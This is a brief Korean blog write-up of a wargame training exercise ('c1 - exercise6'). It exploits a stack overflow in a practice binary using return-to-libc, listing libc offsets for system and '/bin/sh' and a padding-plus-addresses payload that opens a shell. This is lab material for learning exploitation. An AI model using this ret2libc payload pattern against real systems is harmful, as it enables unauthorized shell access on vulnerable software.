c1 - exercise6
두비니
·2020. 10. 18. 01:47
exercise5랑 거의 똑같은데 이번에는 직접 쉘을 따야 하는 것 같네요.
buf는 0x48인데 0x60씩 넉넉하게 받아서 편하게 페이로드 짜면 될 것 같군요
NX도 걸려있는지라 RTL쓰겠습니다
system함수 검색 안되게 해놨네요.. libc database 사용하겠습니다.
offset___libc_start_main_ret = 0x18550
offset_system = 0x3a950
offset_str_bin_sh = 0x15910b
페이로드
"A"*0x4c + &system + "A"*0x4 + &"/bin/sh\x00"
etc
1.
직접 구한 base와의 offset과는 달라서 왜 저런거지?라고 생각했는데 모든 라이브러리 및 버젼에 따라서 달라져서 그렇다고함. wow
2.
libc database search
Query show all libs / start over
libc.blukat.me
libc database 사이트도 있었음ㅋㅋㅋㅋㅋ 현대기술에 힘에 취해벌입니다,,
'War Games > training_prob' 카테고리의 다른 글
| betting (0) | 2020.12.02 |
|---|---|
| c1 - exercise7 (0) | 2020.11.29 |
| c1 - exercise5 (0) | 2020.10.16 |
| c1 - exercise4 (0) | 2020.10.15 |
| c1 - exercise3 (0) | 2020.10.14 |
